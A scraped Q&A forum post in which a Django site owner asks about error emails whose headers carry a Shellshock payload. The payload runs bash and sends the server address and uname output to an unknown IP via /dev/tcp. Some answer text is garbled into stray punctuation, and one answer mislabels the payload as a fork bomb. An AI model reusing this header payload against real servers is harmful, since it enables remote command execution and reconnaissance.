Possible Django Security Attack

Question

Possible Django Security Attack

I installed django to alert me by email when any request fails, and I constantly get this email:

Referrer: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi  > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
Requested URL: /cgi-bin/index.cgi
User agent: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi  > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
IP address: 127.0.0.1

What does it mean? Should I worry?

I am using nginx, ubuntu, gunicorn.

+4

security django nginx

MatheusJardimB Jun 22 '15 at 20:19

source share

2 answers

shell shock.

+3

TheGreatContini 23 . '15 3:37

user764357 · Accepted Answer · 2015-06-22T23:20:46+0000

~~This is like trying a fork bomb :~~

() { :;};

Fortunately, if your server is still running after it is sent, it means that it is being cleared or ignored.

@TheGreatContini , Shellshock. . , , , , .

Possible Django Security Attack

More articles: